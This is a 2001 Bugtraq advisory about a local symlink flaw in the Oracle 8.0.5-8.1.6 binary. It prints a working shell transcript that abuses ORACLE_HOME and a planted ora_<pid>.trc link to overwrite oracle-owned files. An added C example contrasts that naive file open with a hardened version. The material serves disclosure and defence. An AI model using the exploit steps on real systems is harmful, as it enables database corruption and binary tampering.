

vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6


Date: Thu, 02 Aug 2001 09:57:26 +0200
From: Juan Manuel Pascual Escriba <pask@plazasite.com>
To: bugtraq@securityfocus.com, oracle-l@faticity.com
Subject: vulnerability in oracle binary in Oracle 8.0.5 - 8.1.6





                      WWW.PLAZASITE.COM

                  System & Security Division





   Title:     Vulnerability in oracle binary in Oracle 8.0.5

    Date:     11-12-2000

Platform:     Only tested on Linux, but can be "exported" to others.

  Impact:     Any user can compromise any file owned by oracle (database owner).

  Author:     Juan Manuel Pascual (pask@plazasite.com)

  Status:     Vendor Contacted at 18th July 2001

PROBLEM SUMMARY:
    There is a write permission checking error in the oracle binary that can
be used by local users to write to any file owned by oracle.

IMPACT:
    Any user with local access can corrupt the database, overwrite
oracle binaries, etc.

SOLUTION:
    Chmod -s ;-)))).

STATUS:
    Vendor was contacted.

----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@plazasite.com


Only for educational purposes. (Corrupting a database isn't an educational purpose!)

[pask@proves1 /tmp]$
[pask@proves1 /tmp]$ mkdir rdbms
[pask@proves1 /tmp]$ cd rdbms/
[pask@proves1 rdbms]$ mkdir log
[pask@proves1 rdbms]$ cd log
[pask@proves1 log]$ 
[pask@proves1 log]$ ls -alc
total 8
drwxrwxr-x    2 pask     pask         4096 dic 14 02:33 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
[pask@proves1 log]$ export ORACLE_HOME=/tmp
[pask@proves1 log]$ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ ls -alc
total 12
drwxrwxr-x    2 pask     pask         4096 dic 14 02:35 .
drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 ..
-rw-r-----    1 oracle   pask           47 dic 14 02:35 ora_24028.trc

Oops, a log owned by oracle, named with the structure ora_pid.trc.
I can create:
[pask@proves1 log]$ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
[pask@proves1 log]$ $REAL_ORACLE_HOME/bin/oracle
.
..
...
until the log is my link, and I overwrite the binary. What about dbf files, and so on ....
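
The transcript above shows a privileged binary creating ora_<pid>.trc under a directory taken from ORACLE_HOME and writing through a link placed there. The following is an added example, not part of the original post and not Oracle's code: it sets an assumed naive open beside a hardened one that refuses untrusted directories, links and pre-existing names. The function names, the /tmp/trcdemo directory and the pid values are constructed for illustration.

```c
#define _GNU_SOURCE 1
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* Assumed naive behaviour (not Oracle's source): opens whatever sits at the path. */
int open_trace_naive(const char *dir, long pid) {
    char path[4096];
    snprintf(path, sizeof path, "%s/ora_%ld.trc", dir, pid);
    return open(path, O_WRONLY | O_CREAT | O_APPEND, 0640);
}

/* Hardened form: distrust the directory, refuse links and existing files. */
int open_trace_safe(const char *dir, long pid) {
    char path[4096];
    struct stat ds, fs;
    /* The directory must be owned by the effective user, not writable by others. */
    if (lstat(dir, &ds) != 0 || !S_ISDIR(ds.st_mode) ||
        ds.st_uid != geteuid() || (ds.st_mode & (S_IWGRP | S_IWOTH)))
        return -1;
    if (snprintf(path, sizeof path, "%s/ora_%ld.trc", dir, pid) >= (int)sizeof path)
        return -1;
    /* O_EXCL fails on any existing name, including a planted symlink;
       afterwards verify the object that was actually opened. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC, 0640);
    if (fd >= 0 && (fstat(fd, &fs) != 0 || !S_ISREG(fs.st_mode) ||
                    fs.st_nlink != 1 || fs.st_uid != geteuid())) {
        close(fd);
        fd = -1;
    }
    return fd;
}

/* Constructed self-check in a private temp directory; returns 15 when all hold. */
int demo(void) {
    char dir[] = "/tmp/trcdemoXXXXXX", target[4096], lnk[4096];
    int r = 0, fd;
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(lnk, sizeof lnk, "%s/ora_4242.trc", dir);
    close(open(target, O_WRONLY | O_CREAT, 0600));
    if (symlink(target, lnk) != 0) return -1;
    if ((fd = open_trace_safe(dir, 4242)) < 0) r |= 1; else close(fd);  /* link refused */
    if ((fd = open_trace_naive(dir, 4242)) >= 0) { r |= 2; close(fd); } /* link followed */
    if ((fd = open_trace_safe(dir, 4243)) >= 0) { r |= 4; close(fd); }  /* fresh name ok */
    chmod(dir, 0777);
    if (open_trace_safe(dir, 4244) < 0) r |= 8;          /* writable directory refused */
    return r;
}
```

In the scenario from the transcript the directory check alone rejects /tmp/rdbms/log, because it is owned by the calling user rather than by the effective (oracle) user.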